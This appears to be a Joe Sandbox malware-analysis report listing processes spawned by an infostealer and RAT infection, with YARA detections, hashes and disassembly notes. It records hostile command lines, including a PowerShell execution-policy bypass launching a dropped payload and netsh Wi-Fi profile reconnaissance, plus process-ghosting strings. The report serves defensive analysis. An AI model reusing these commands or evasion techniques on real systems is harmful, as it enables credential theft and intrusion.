Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	07:27:24
Start date:	06/07/2024
Path:	C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe"
Imagebase:	0xa70000
File size:	307'712 bytes
MD5 hash:	7081E613321921500B70899FDDB56A4D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000000.1945315404.0000000000A72000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:27:31
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat""
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:27:31
Start date:	06/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:27:34
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 3
Imagebase:	0xaf0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:27:39
Start date:	06/07/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:	0x1f0000
File size:	48'640 bytes
MD5 hash:	C709136E78750FEB6CB85F99EDA16629
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.3189493490.000000000511F000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.3188525129.0000000005100000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.3174046241.0000000003807000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.3152328073.00000000029C5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000002.3207543510.0000000006A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.3217843417.0000000006D60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.3191349230.000000000515B000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.3152328073.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.3136390098.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000002.3152328073.000000000283E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000018.00000002.3152328073.000000000283E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	07:28:04
Start date:	06/07/2024
Path:	C:\Users\user\Desktop\xj40xovMsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\xj40xovMsm.exe"
Imagebase:	0x7ff68a180000
File size:	15'088'640 bytes
MD5 hash:	1082572A44D4C41214A3C38DCD8289F9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:28:09
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	07:28:09
Start date:	06/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:28:11
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"'
Imagebase:	0x880000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	07:28:11
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:28:11
Start date:	06/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:28:13
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x150000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:28:15
Start date:	06/07/2024
Path:	C:\ProgramData\KMSAuto\accc.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\KMSAuto\accc.exe"
Imagebase:	0x580000
File size:	631'296 bytes
MD5 hash:	BED8CDCED2D57BE2BD750F0F59991ECD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_KeyzetsuClipper, Description: Yara detected Keyzetsu Clipper, Source: 00000020.00000002.2548612553.0000000002897000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_KeyzetsuClipper, Description: Yara detected Keyzetsu Clipper, Source: 00000020.00000002.2548612553.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	07:28:17
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7560, Parent PID: 7020

General

Target ID:	34
Start time:	07:28:17
Start date:	06/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	07:28:18
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	07:28:18
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0xe30000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	07:28:20
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x150000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	07:28:22
Start date:	06/07/2024
Path:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"
Imagebase:	0x230000
File size:	327'680 bytes
MD5 hash:	C28490DA01887AA59D82C54B576DC107
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, Author: ditekSHen Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, Author: ditekSHen
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	07:28:22
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	07:28:23
Start date:	06/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	07:28:23
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0x7ff726ad0000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	07:28:24
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0xe30000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	07:28:25
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x150000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	07:28:29
Start date:	06/07/2024
Path:	C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase:	0xdd0000
File size:	48'640 bytes
MD5 hash:	C709136E78750FEB6CB85F99EDA16629
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000002D.00000002.2707163319.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000002D.00000002.2773682295.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	07:28:30
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: relog.exePID: 7536, Parent PID: 7208

General

Target ID:	47
Start time:	07:28:30
Start date:	06/07/2024
Path:	C:\Windows\System32\relog.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\relog.exe
Imagebase:	0x7ff698010000
File size:	53'760 bytes
MD5 hash:	F445286ECB5A74AAF2C103D05879F1C1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	07:28:31
Start date:	06/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	07:28:31
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	07:28:32
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x150000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	07:28:34
Start date:	06/07/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	07:28:40
Start date:	06/07/2024
Path:	C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe"
Imagebase:	0x7ff7c9b00000
File size:	238'080 bytes
MD5 hash:	839B3EFD5782B6FC122855665F3AA202
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	07:28:43
Start date:	06/07/2024
Path:	C:\Windows\System32\relog.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\relog.exe
Imagebase:	0x7ff698010000
File size:	53'760 bytes
MD5 hash:	F445286ECB5A74AAF2C103D05879F1C1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	07:28:52
Start date:	06/07/2024
Path:	C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe"
Imagebase:	0x7ff7c9b00000
File size:	238'080 bytes
MD5 hash:	839B3EFD5782B6FC122855665F3AA202
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	07:28:54
Start date:	06/07/2024
Path:	C:\Windows\System32\relog.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\relog.exe
Imagebase:	0x7ff698010000
File size:	53'760 bytes
MD5 hash:	F445286ECB5A74AAF2C103D05879F1C1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	29.5%
Total number of Nodes:	1988
Total number of Limit Nodes:	20

Executed Functions

Function 00007FF68A18384C Relevance: 38.6, APIs: 13, Strings: 9, Instructions: 115
libraryloaderfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 00007FF68A183877
GetProcAddress.KERNEL32 ref: 00007FF68A183895
GetProcAddress.KERNEL32 ref: 00007FF68A1838B5
GetProcAddress.KERNEL32 ref: 00007FF68A1838D5
GetProcAddress.KERNEL32 ref: 00007FF68A1838F5
GetProcAddress.KERNEL32 ref: 00007FF68A183911
GetProcAddress.KERNEL32 ref: 00007FF68A18392D
GetProcAddress.KERNEL32 ref: 00007FF68A183949
GetModuleFileNameW.KERNEL32 ref: 00007FF68A18396D
ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF68A183999
CreateFileW.KERNEL32 ref: 00007FF68A1839C8
CloseHandle.KERNEL32 ref: 00007FF68A1839EE
VirtualFree.KERNELBASE ref: 00007FF68A183A28

Strings

NtCreateProcessEx, xrefs: 00007FF68A18388B
NtResumeProcess, xrefs: 00007FF68A183938
NtQueryInformationFile, xrefs: 00007FF68A1838E4
ntdll.dll, xrefs: 00007FF68A183870
NtSuspendProcess, xrefs: 00007FF68A18391C
RtlCreateProcessParametersEx, xrefs: 00007FF68A1838A4
NtCreateThreadEx, xrefs: 00007FF68A1838C4
%SystemRoot%\system32\relog.exe, xrefs: 00007FF68A18398F
NtQuerySystemInformation, xrefs: 00007FF68A183900

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: AddressProc$File$CloseCreateEnvironmentExpandFreeHandleLibraryLoadModuleNameStringsVirtual
String ID: %SystemRoot%\system32\relog.exe$NtCreateProcessEx$NtCreateThreadEx$NtQueryInformationFile$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$RtlCreateProcessParametersEx$ntdll.dll
API String ID: 2492227563-894273064
Opcode ID: 05723221f10f05c9ceba05eb359f8972ba9721e587aa526d6aa84a9de4d9c412
Instruction ID: 7da8b0877a216bffa6d8dc241a36f73f3239a102c3cb45b101464b88a36a948b
Opcode Fuzzy Hash: 05723221f10f05c9ceba05eb359f8972ba9721e587aa526d6aa84a9de4d9c412
Instruction Fuzzy Hash: 38511B60B0BB82E1EE109B11E8542696BA5BF89B80F8841BDDDDD97795EF7CE409C700

Function 00007FF68A1832A8 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 166
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32 ref: 00007FF68A183320
GetTempFileNameW.KERNEL32 ref: 00007FF68A18333B
RtlInitUnicodeString.NTDLL ref: 00007FF68A18339B
NtOpenFile.NTDLL ref: 00007FF68A18340D
NtSetInformationFile.NTDLL ref: 00007FF68A1834A0
NtWriteFile.NTDLL ref: 00007FF68A1834DD
GetLastError.KERNEL32 ref: 00007FF68A1834E7

Strings

, xrefs: 00007FF68A1833EA
ghosting, xrefs: 00007FF68A18346E
\??\, xrefs: 00007FF68A183356
lockering, xrefs: 00007FF68A1834EF
herpaderping, xrefs: 00007FF68A183475, 00007FF68A1834F6
0, xrefs: 00007FF68A1833B1
@, xrefs: 00007FF68A1833BE

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: File$Temp$ErrorInformationInitLastNameOpenPathStringUnicodeWrite
String ID: $0$@$\??\$ghosting$herpaderping$lockering
API String ID: 2041432290-2373984688
Opcode ID: 64822b8613db8bc1c2a2e951a3a571df23e4e807d8a1f1aa68da66fb63762df5
Instruction ID: e6cecb5f7335d42fc58387536666ec0157e3c802c43c1b7805aa00b07d81f052
Opcode Fuzzy Hash: 64822b8613db8bc1c2a2e951a3a571df23e4e807d8a1f1aa68da66fb63762df5
Instruction Fuzzy Hash: 99816032B19A81E9E710CF64E8842ED3BB5FF44758F440179DE9DA6AA8DF38E549C700

Function 00007FF68A1878F0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68A187718: GetWindowsDirectoryA.KERNEL32 ref: 00007FF68A187763
Part of subcall function 00007FF68A187718: GetVolumeInformationA.KERNEL32 ref: 00007FF68A1877AB
Part of subcall function 00007FF68A187718: wsprintfA.USER32 ref: 00007FF68A187811

SHGetFolderPathA.SHELL32 ref: 00007FF68A187958
lstrcatA.KERNEL32 ref: 00007FF68A18798C
lstrcatA.KERNEL32 ref: 00007FF68A18799C
